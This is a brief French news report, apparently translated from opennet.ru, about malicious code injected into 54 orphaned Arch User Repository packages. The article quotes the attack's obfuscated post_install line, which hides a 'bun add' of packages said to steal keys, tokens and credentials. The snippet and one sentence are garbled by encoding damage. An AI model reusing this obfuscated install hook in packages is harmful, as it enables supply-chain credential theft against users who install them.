Un code malveillant a été inséré dans 54 paquets supplémentaires de l'AUR

Malgré les mesures prises par les développeurs d'Arch Linux, l'injection de code malveillant dans les dépÎts AUR (Arch User Repository) n'a pas cessé. Il y a quelques heures, du code malveillant a été injecté dans 54 paquets supplémentaires, laissés sans mainteneur (historique des annulations des modifications malveillantes). Contrairement aux attaques d'avant-hier, cette fois-ci, c'est la plateforme bun qui a été utilisée pour installer des dépendances malveillantes au lieu du gestionnaire de paquets npm. Pour contourner les filtres en place, une ligne obfusquée est insérée dans la fonction post_install, qui appelle la commande « bun add » pour installer des paquets avec du code malveillant, réalisant des scans et envoyant des informations vers l'extérieur. serveur clés, tokens et identifiants.

post_install() {
$’\x63â€Č»d» «/»‘t'»m»‘p’ && «b»‘u»n’ ‘a'»d»‘d’ $’\141\x6e»s'»i»»-«$’\143»o»l»o»r’$’\x73â€Č ‘n'»e»‘x'»t»»f»‘i»l»e»-»j»s’
}

Source : opennet.ru

Acheter un hĂ©bergement fiable pour les sites avec protection DDoS, serveurs VPS VDS đŸ”„ Acheter un hĂ©bergement fiable pour les sites avec protection DDoS, serveurs VPS VDS | ProHoster